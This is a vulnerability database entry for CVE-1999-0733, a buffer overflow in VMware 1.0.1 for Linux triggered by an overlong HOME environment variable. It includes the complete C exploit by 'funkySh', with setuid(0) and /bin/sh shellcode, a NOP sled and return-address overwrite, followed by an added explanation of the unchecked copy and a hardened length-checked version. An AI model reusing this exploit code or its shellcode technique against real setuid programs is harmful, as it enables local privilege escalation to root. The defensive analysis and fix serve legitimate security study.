Linux VMware buffer overflow vulnerability

Vulnerability ID: 1105481    Vulnerability type: buffer overflow
Published: 1999-06-25    Updated: 2005-05-02
CVE ID: CVE-1999-0733
CNNVD ID: CNNVD-199906-029
Platform: Linux    CVSS score: 7.2
|Sources
https://www.exploit-db.com/exploits/19371
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199906-029
|Details
VMware 1.0.1 for Linux contains a buffer overflow that is triggered by an overlong HOME environment variable. Because the vmware binaries are installed setuid root, a local user who sets HOME before starting vmware can execute arbitrary code as root.
|Exploit
source: http://www.securityfocus.com/bid/490/info


VMware is virtual machine software produced by VMware Inc. VMware 1.0.1 for Linux is vulnerable to a buffer overflow. Since VMware installs binaries that are setuid root, a local user can trigger the overflow (through an overlong HOME environment variable) and have arbitrary code executed as root. The consequence is a local root compromise.

/* 
 * VMware v1.0.1 root sploit
 * funkySh 02/07/99
 * 
 * 1. Redhat 5.2     2.2.9 offset 800-1100
 * 2.                      offset 1600-2200
 * 1. Slackware 3.6  2.2.9 offset 0
 * 2.                      offset ?       
 *
 * [ 1 - started from xterm on localhost ]
 * [ 2 - started from telnet, with valid display ]
 */

#include <stdio.h>
#include <stdlib.h>   /* atoi, setenv */
#include <string.h>   /* memset, memcpy, strlen */
#include <unistd.h>   /* execl */

/* Linux/x86 shellcode: setuid(0), then the classic execve("/bin/sh").
   The escape sequences were lost in extraction and are restored here. */
char code[] = "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /*setuid(0) */
              "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
              "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
              "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

#define BUFFER 1032            /* length of the HOME value handed to vmware */
#define NOP 0x90 
#define RET_ADDR 0xbfffdf50    /* guessed stack address, tuned with the offset argument */
#define PATH "/usr/local/bin/vmware"

char buf[BUFFER + 1];          /* +1 so the 1032-byte payload is NUL-terminated for setenv */

int main(int argc, char * argv[])
{
  int i, offset = 0;
  if(argc > 1) offset = atoi(argv[1]);

  /* NOP sled, shellcode at offset 800, then the return address repeated
     (4-byte aligned) over the rest of the buffer to overwrite the saved EIP */
  memset(buf,NOP,BUFFER);
  buf[BUFFER] = '\0';
  memcpy(buf+800,code,strlen(code));
  for(i=854+2;i<BUFFER-2;i+=4)
    *(int *)&buf[i]=RET_ADDR+offset;

  setenv("HOME", buf, 1);
  execl(PATH,"vmware","-display","127.0.0.1:0",(char *)NULL);
  /* change IP if required */
  perror("execl");             /* only reached if vmware could not be started */
  return 1;
}
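The exploit above works because a setuid-root binary copies an attacker-controlled environment variable into a fixed-size buffer without a length check. The following is an added illustration of that bug class and its fix; it is not VMware's code and not part of the original advisory. The buffer size `HOME_BUF`, the function names and the sample HOME values are assumptions made for the example.

```c
/* Added example: the unbounded-copy pattern behind CVE-1999-0733 beside a
 * hardened form. Not VMware's code; HOME_BUF and all names are assumed. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define HOME_BUF 1024   /* assumed size of the program's HOME buffer */

/* Vulnerable pattern: unbounded strcpy from the environment. A HOME value
 * longer than HOME_BUF-1 bytes runs past 'out'; when 'out' is on the stack
 * it reaches the saved return address, which is what the exploit relies on. */
void load_home_unsafe(const char *home, char out[HOME_BUF])
{
    strcpy(out, home);
}

/* Hardened form: validate length and shape before copying, and fail closed.
 * Truncating would just be a second bug (the program would act on a path
 * other than the one it was given), so an over-long value is refused. */
int load_home_checked(const char *home, char *out, size_t outsz)
{
    if (home == NULL || outsz == 0)
        return -1;
    size_t n = strlen(home);
    if (n == 0 || n >= outsz)          /* '>=' keeps room for the NUL */
        return -1;
    if (home[0] != '/')                /* a home directory is an absolute path */
        return -1;
    if (strstr(home, "/../") != NULL)  /* no reason to tolerate embedded traversal */
        return -1;
    memcpy(out, home, n + 1);
    return 0;
}

/* Constructs the kind of value the exploit sets: 'len' non-NUL bytes. */
static void build_long_home(char *dst, size_t len)
{
    memset(dst, 'A', len);
    dst[len] = '\0';
}

/* A normal HOME is accepted and stored verbatim (returns 0). */
int demo_normal_home(void)
{
    char out[HOME_BUF];
    if (load_home_checked("/home/alice", out, sizeof out) != 0)
        return -1;
    return strcmp(out, "/home/alice");
}

/* A 1032-byte HOME like the exploit's (constructed, all 'A') is refused
 * before a single byte is written (returns -1). */
int demo_exploit_sized_home(void)
{
    char attacker[1032 + 1];
    char out[HOME_BUF];
    build_long_home(attacker, sizeof attacker - 1);
    return load_home_checked(attacker, out, sizeof out);
}

/* A relative value is refused as well (returns -1). */
int demo_relative_home(void)
{
    char out[HOME_BUF];
    return load_home_checked("alice", out, sizeof out);
}

int main(void)
{
    char out[HOME_BUF];
    load_home_unsafe("/home/alice", out);   /* benign input: works, by luck of length */
    printf("unsafe copy of short HOME: %s\n", out);
    printf("checked, normal HOME:      %d\n", demo_normal_home());
    printf("checked, 1032-byte HOME:   %d\n", demo_exploit_sized_home());
    printf("checked, relative HOME:    %d\n", demo_relative_home());
    /* load_home_unsafe is deliberately never called with the long value:
     * it would corrupt this stack frame exactly as the exploit intends. */
    return 0;
}
```

The length check removes the overflow, but a setuid program still should not build paths from HOME at all: the variable is fully under the caller's control. The robust fix is to look the home directory up from the real user ID (getpwuid(getuid())->pw_dir) or to drop root privileges before anything from the environment is used.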
|References

Source: BID
Name: 490
Link: http://www.securityfocus.com/bid/490
